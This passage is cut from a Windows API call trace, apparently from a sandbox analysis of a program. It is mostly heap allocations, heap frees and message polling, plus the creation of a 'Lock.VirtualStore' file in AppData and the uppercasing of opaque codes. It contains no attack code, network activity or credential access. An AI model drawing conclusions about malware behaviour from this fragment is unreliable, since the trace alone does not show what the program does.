dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.437] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0251.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0251.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0251.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0251.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0251.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0251.441] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.441] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.441] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.441] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/VirtualStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.442] GetLastError () returned 0x5 [0251.442] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0251.442] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.442] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0251.442] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.VirtualStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.virtualstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0251.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0251.443] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0251.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.445] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0251.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.445] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0251.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.446] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.446] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.446] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.447] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.447] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.447] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.447] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.447] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.447] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.447] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.448] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.448] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.448] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.448] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.448] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.448] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.448] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.448] RtlAllocateHeap 